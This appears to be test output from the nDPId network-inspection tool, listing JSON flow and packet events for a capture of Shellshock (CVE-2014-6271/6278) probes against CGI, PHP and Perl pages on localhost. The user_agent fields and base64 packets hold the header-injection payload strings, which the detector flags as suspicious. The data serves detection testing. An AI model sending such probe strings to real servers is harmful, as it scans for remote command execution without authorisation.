-00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277412,"pkt":"AAAAAAAAAAAAAAAACABFAAEOAyBAAEAGOMh\/AAABfwAAAcUwH5BOyzvYEAppQYAYAED\/AgAAAQEICp1m\/cydZv3MR0VUIC9ndWVzdGJvb2suY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01169{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277414,"pkt":"AAAAAAAAAAAAAAAACABFAAENCPdAAEAGMvJ\/AAABfwAAAcUyH5A4wTA94El3uoAYAED\/AQAAAQEICp1m\/c6dZv3OR0VUIC9oZWxwZGVzay5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277414,"flow_last_seen":1576420277414,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277414,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50482,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/helpdesk.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_packet_id":1,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277416,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgptAAEAGuVB\/AAABfwAAAcU0H5CIJLpUcW+qJoAYAED+\/gAAAQEICp1m\/dCdZv3QR0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":461,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277416,"flow_last_seen":1576420277416,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277416,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50484,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_packet_id":1,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277417,"pkt":"AAAAAAAAAAAAAAAACABFAAEKMxlAAEAGCNN\/AAABfwAAAcU2H5CRJgvewUykPIAYAED+\/gAAAQEICp1m\/dGdZv3RR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":462,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277417,"flow_last_seen":1576420277417,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277417,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50486,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277419,"pkt":"AAAAAAAAAAAAAAAACABFAAEJrmtAAEAGjYF\/AAABfwAAAcU4H5CXuZakZnwUBoAYAED+\/QAAAQEICp1m\/dOdZv3TR0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277419,"flow_last_seen":1576420277419,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277419,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50488,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277420,"pkt":"AAAAAAAAAAAAAAAACABFAAEJZRVAAEAG1td\/AAABfwAAAcU6H5C6AV3ZPf\/xToAYAED+\/QAAAQEICp1m\/dSdZv3UR0VUIC9pbmZvLmNnaSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277420,"flow_last_seen":1576420277420,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277420,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50490,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277422,"pkt":"AAAAAAAAAAAAAAAACABFAAEI0gtAAEAGaeJ\/AAABfwAAAcU8H5DcN+rDzEDc2oAYAED+\/AAAAQEICp1m\/dadZv3WR0VUIC9pbmZvLnNoIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="} -01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":465,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277422,"flow_last_seen":1576420277422,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277422,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50492,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/info.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277423,"pkt":"AAAAAAAAAAAAAAAACABFAAENVqhAAEAG5UB\/AAABfwAAAcU+H5CeOW5utt+cAoAYAED\/AQAAAQEICp1m\/dedZv3XR0VUIC9sb2FkcGFnZS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277425,"pkt":"AAAAAAAAAAAAAAAACABFAAEKJkVAAEAGFad\/AAABfwAAAcVAH5DPeB6QOQhEGoAYAED+\/gAAAQEICp1m\/didZv3YR0VUIC9sb2dpbi5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277426,"pkt":"AAAAAAAAAAAAAAAACABFAAEKG0lAAEAGIKN\/AAABfwAAAcVCH5Dr2SOM+8VpkIAYAED+\/gAAAQEICp1m\/dqdZv3aR0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 